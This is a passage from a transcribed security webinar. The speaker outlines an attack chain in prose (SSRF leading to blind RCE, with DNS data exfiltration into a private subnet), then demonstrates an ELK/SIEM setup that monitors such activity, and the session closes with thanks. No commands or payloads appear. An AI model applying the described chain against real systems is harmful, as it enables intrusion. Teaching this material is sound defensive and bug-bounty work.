subnet. You have only access to this public subnet area. Okay, it is also installed as running the WAF, which is web application firewall. That can be a mode security or anything like that. So as an attacker, you can only access this particular thing, right? This is the real scenario. So now what? Using this, I'm so sorry, I need to change the color. Using this server, you need to access the internal, or you can say private subnet of this, and you will access the dashboard. This is running over here. Okay, so this server is vulnerable to SSRF, right? And using SSRF, this server is actually vulnerable to blind RCE, and you exfiltrate the data using DNS. Okay. Now let's come to the point again. I need 5 more minutes. Let's understand another area of monitoring servers. Monitoring servers. See, this is related to SIEM. SI, sorry, SIEM or threat intelligence or something. That kind of server is configured on every organization to monitor all the infrastructure, right? Whatever you are doing, that is monitoring or monitored on the backend server. That is called SIEM, or you can say ELK. That is Elasticsearch, Logstash, and Kibana. I configured it, and let me show you that we have. Right now, I'm working in an organization, and I am seeing what you are doing. You perform DNS exfiltration, you perform many other things, and let me show you that uh, our our ELK stack is actually running on 138, I think so. I have no idea which port it is running on. Let me show you that. Okay, it's running on 30. So we just need to type 30, and yes, this is the SIEM server that is running Kibana Elasticsearch. See, Kibana Elasticsearch and Logstash. So we are actually using this to monitor our infrastructure. Okay, that will help you to monitor your security. आपको बोलते ना कि when you supposed to submit a bug, we will investigate your bug and we will figure out that what you perform on our server. So if everything is legitimate, we will give you a bounty. So we connected an agent. This is our agent. Yes. So this is our agent, which is master.sniper.com, which is running on CentOS. And these are all the information related to all the events. You can monitor the compliance over here. Compliances, we have PCI, DSS, GDPR, HIPAA, whatever kind of organization you are using or something. And you can click on security events, and we have total 183 events. So we have every log over here. Whatever you are doing, everything is monitored, and these are the audit logs. And you can see we have named log over here, all the graph. I'm so I'm so sorry. See, so this is how the administrator or SIEM or SOC, which is the analyst, right, are performing everything, and they will all obviously give you a report. You can generate the report, you can read every information on this, and this is how you can perform the entire attack on an organization. So this is all from my side. So I just need to say thank you to all of you. Okay, this is the final, and I think I just closed the presentation. I'm so sorry. Let me open it again. So we have the presentation, and I just want to say thank you to Reset Hacker. Thank you so much, guys, for this patience, and I hope this session is nice. I hope you like it. And this is all about me. If you want to contact me, you can contact me from any of these social media platform or handle. So thank you so much. and you can share your information, and I will definitely share the text file to all of you. And over to you, Reset Hacker. Thank you so much.
Okay. Okay. So if you have any kind of question or something which you want to ask or discuss, then it will be like just comment in the comment section. It will be great. And thank you, Dheeraj, for the amazing session. I really enjoyed it. So that was like actually a lot of people enjoyed, not only me. So I think it was like one of the great session what we conducted on
Thank
the
you so
reset.
much. Thank you, really. Thank you so much.
Yes, thank you. We will be in the touch after this session, and we will have the conversation.
Sure, sure, sure.
And yeah, anyone else have any kind of question or something? And yeah, yeah, of course, Guru. Anyone have? Okay, okay. Thank you, Pratik. Thank you, really. Okay, so we will be ending this session, and please share your review on the social media platform. It will be like a great help for the reset hacker community. And we are a community from the India, and basically we are trying to like bring Indian people or Indian speaker. Okay. So if you have any kind of suggestion regarding the speaker or any you want to like discuss on want some kind of webinar on some certain topic, then let me know. We are going to like organize in the next week, next month. Okay, everyone, have a great day and thank you, everyone.
Thank you, guys. Bye bye.
Bye, everyone. Bye. Okay, bye. Okay, let me into the broadcast. Then we will have the conversation.